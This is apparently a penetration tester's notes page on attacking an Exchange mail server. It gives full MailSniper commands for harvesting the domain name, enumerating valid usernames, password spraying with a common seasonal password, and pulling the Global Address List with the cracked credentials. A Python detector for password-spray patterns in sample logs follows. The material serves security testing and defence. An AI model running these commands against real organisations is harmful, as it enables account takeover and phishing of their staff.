Programmerboy Pentesting Stuff

Attacking Office 365 & Exchange


Last updated 10 months ago

In this scenario I have a subdomain, mail.redacted.io. I will now password spray against this domain so that I can phish the target, and for this I will use MailSniper.

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

Invoke-DomainHarvestOWA -ExchHostname mail.redacted.io

Now we need to find the valid usernames, so we do username enumeration. Candidate usernames can be found by a lot of methods, like the public website or hunter.io. Now we start our attack on the mail subdomain: Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.

Invoke-UsernameHarvestOWA -ExchHostname mail.redacted.io -Domain redacted.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

We have found 3 valid usernames. Now we will try to password spray as well using MailSniper, and we will use the password Summer2022 just to test, because a lot of organizations are using the default password.

Invoke-PasswordSprayOWA -ExchHostname mail.redacted.io -UserList .\Desktop\valid.txt -Password Summer2022

Now we have a valid username and password, so we need to enumerate some more information with these valid credentials.

We will try to download the GAL (Global Address List), which contains the list of email addresses and some other potentially useful data.

Get-GlobalAddressList -ExchHostname mail.redacted.io -UserName redacted.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt
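
From the defender's side, the spray shown above leaves a recognisable pattern in authentication logs: one source failing against many different accounts in a short time, sometimes followed by a success. The detector below is an added example, not part of the original notes or of MailSniper; the log format, IP addresses, thresholds and every username except iyates are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified, hypothetical format (not real IIS or
# Exchange output): "ISO-timestamp source-IP username result"
SAMPLE_LOG = """\
2022-07-04T09:00:01 203.0.113.50 asmith FAIL
2022-07-04T09:00:03 203.0.113.50 bjones FAIL
2022-07-04T09:00:05 203.0.113.50 iyates OK
2022-07-04T09:00:07 203.0.113.50 cwhite FAIL
2022-07-04T09:03:10 198.51.100.7 dgreen FAIL
2022-07-04T09:03:40 198.51.100.7 dgreen FAIL
2022-07-04T09:04:15 198.51.100.7 dgreen OK
"""

def parse(log):
    """Return time-ordered (timestamp, ip, user, success) tuples."""
    events = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of crashing
        ts, ip, user, result = parts
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result == "OK"))
    return sorted(events)

def detect_spray(events, min_users=3, window=timedelta(minutes=5)):
    """Map each spraying source IP to the accounts that logged in from it."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # slide the window forward
            failed = {e[2] for e in evs[start:end + 1] if not e[3]}
            if len(failed) >= min_users:
                # Failures across many accounts: treat any login from this IP as compromised.
                findings[ip] = sorted({e[2] for e in evs if e[3]})
                break
    return findings

if __name__ == "__main__":
    print(detect_spray(parse(SAMPLE_LOG)))
```

Accounts listed for a flagged source are the ones to reset and review first. The single user who mistypes a password twice (dgreen here) is not flagged, because only one account is involved.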

GitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.